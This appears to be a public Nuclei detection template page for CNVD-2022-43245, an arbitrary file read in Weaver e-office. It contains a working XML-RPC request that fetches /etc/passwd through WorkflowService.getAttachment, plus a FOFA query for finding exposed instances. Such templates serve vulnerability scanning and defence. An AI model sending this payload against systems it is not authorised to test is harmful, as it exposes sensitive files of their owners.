Skip to content

Weaver OA XmlRpcServlet - Arbitary File Read

ID: CNVD-2022-43245

Severity: high

Author: SleepingBag945

Tags: cnvd,cnvd2022,weaver,e-office,oa,lfi

e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.

id: CNVD-2022-43245
info:
name: Weaver OA XmlRpcServlet - Arbitary File Read
author: SleepingBag945
severity: high
description: |
e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.
classification:
cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: weaver
product: e-office
fofa-query: app="泛微-协同办公OA"
tags: cnvd,cnvd2022,weaver,e-office,oa,lfi
http:
- raw:
- |
POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?><methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params><param><value><string>/etc/passwd</string>
</value></param></params></methodCall>
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<methodResponse><params><param><value><base64>"
- type: word
part: header
words:
- "text/xml"
- type: status
status:
- 200
# digest: 4b0a00483046022100d74050f1ebc3ca6d570704762ef50f40002a96561f1b88cefda744d8d2329f0c022100f71bfa45ed7094aa433b028aa0313d1c58425434a7013ed319de375beb7843a9:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cnvd/2022/CNVD-2022-43245.yaml"

View on Github